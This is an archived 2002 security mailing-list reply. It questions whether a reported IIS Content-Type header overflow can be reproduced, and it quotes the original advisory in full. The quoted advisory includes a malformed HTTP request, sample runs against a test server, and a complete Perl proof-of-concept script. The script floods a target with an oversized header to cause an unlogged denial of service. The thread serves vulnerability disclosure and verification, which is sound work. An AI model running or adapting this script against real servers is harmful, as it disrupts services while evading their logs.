[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: IIS Vulnerability Content-Type overflow



Hi, We were interested in testing this out and were unable to reproduce
the results that you say you saw. Taking your exploit, the only way we
could get any reaction is by sending multiple small size packets in a
loop. In this case, it is more of a traditional packet based DoS

You are right about it not logging the connection though.

I tried both a sp2 patched and a fully patched Windows 2000 Server
machine. What are the specific values you pass the perl program to cause
the DoS situation? Does the service crash? does the memory usage spike?

I also tried ensuring that the requested resource was available, and
changed protocol specs.

Thanks

D

On Mon, 2 Dec 2002, at4r wrote:

> ------------------------ 3wdesign.es security ------------------------
> Advisory: IIS Vulnerability Content-Type overflow
> discovered:  November 26, 2002
> Platforms:  windows NT/2000/xp ( iis 4.0 iis 5.0 iis 5.1 ... ¿ 6.0 ? )
> Vendors:   Microsoft Corporation (http://www.microsoft.com)
> Andrés Tarascó ( at4r at 3wdesign.es ) discovered this vulnerability
> ------------------------ 3wdesign.es security ------------------------
>
>
> while testing a few days ago how to reproduce the lastest mdac rds
> vulnerability i found that a specially malformed http request to an IIS
> Webserver can allow a buffer overflow.
> The bug is in the Content-Type string and seems that is not the same
> vulnerability founded in mdac RDS few days ago by foundstone because IIS
> webservers with all security patches are vulnerable to this.
>
> GET /foo HTTP/1.0
> Host: hax
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 56
> Accept-Language: en
> Content-Type: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...about
> 32700....]
>
>
> When lenght of both content-type strings is ~> 32768 there is an overflow,
> and requests are not being logged by IIS.
>
> here is an example of this bug:
>
> aT4r@server:~$ ./test.pl 192.168.0.69 80 32684
>
> HTTP/1.1 500 Server Error
> Server: Microsoft-IIS/5.0
> Date: Tue, 26 Nov 2002 22:21:56 GMT
> Content-Type: text/html
> Content-Length: 119
>
> <html><head><title>Error</title></head><body>Not enough storage is available
> to complete this operation. </body></html>
> aT4r@server:~$
>
>
> aT4r@server:~$ ./test.pl 192.168.0.69 80 150000
>
> HTTP/1.1 500 Server Error
> Server: Microsoft-IIS/5.0
> Date: Tue, 26 Nov 2002 22:22:30 GMT
> Content-Type: text/html
> Content-Length: 98
>
> <html><head><title>Bad Request</title></head><body><h1>HTTP/1.1 400 Bad
> Request</h1></body></html>
> aT4r@server:~$
>
>
> aT4r@server:~$ ./test.pl 192.168.0.69 80 300000
> aT4r@server:~$
>
>
>
> i have an easy perl script to test this:
>
> [test.pl]--------------------------
> #!/usr/bin/perl -W
> # Its possible to send requests to an IIS webserver without being logged.
> # This allow an attacker to launch a DoS attack against the server with
> # multiple requests having a big CPU Consume.
> # tested under IIS 4.0,  IIS 5.0 and 5.1
> # Email: at4r AT 3wdesign.es
> # Discovered: 26 november 2002
> # Greetings to my friends: Tarako, Drakar, |tyr| , [back] , croulder, ppp0 ,
> Contraste.
>
> require IO::Socket;
>
> if ($#ARGV<1)
> {
>  print "\n use: ./test.pl IP Port N!! \n\n";
>  exit;
> }
>
> printf"\n ----------------------------------------------------\n";
> print "|                IIS Testing                         |\n";
> printf" ----------------------------------------------------\n\n";
>
>
> $cabecera = "GET /foo HTTP/1.0\n".
>    "Host: hax\n".
>    "Content-Type: application/x-www-form-urlencoded\n".
>    "Content-Length: 56\n".
>    "Accept-Language: en\n";
>
> $sock = new IO::Socket::INET (PeerAddr => "$ARGV[0]",
>                                PeerPort => "$ARGV[1]",
>                                Proto    => "tcp");
>
> die "\nCould not connect to $ARGV[0] : $!\n" unless $sock;
>
> print $sock "${cabecera}";
> $bof = `perl -e "print '\x90' x $ARGV[2]"`;
> print $sock "Content-Type: ${bof}\n\r\n\r\n";
>
> while (<$sock>) {
>   print "${_}";
>  }
>
> printf "\n";
>
> --------------------------[test.pl]
>
>
> I dont Know if all webservers are vulnerable to this and if its possible to
> execute code, so please take a look.
> vendor was contacted but i got no answer.
>
> if you got more information please send me an email to: at4r at 3wdesign.es.
>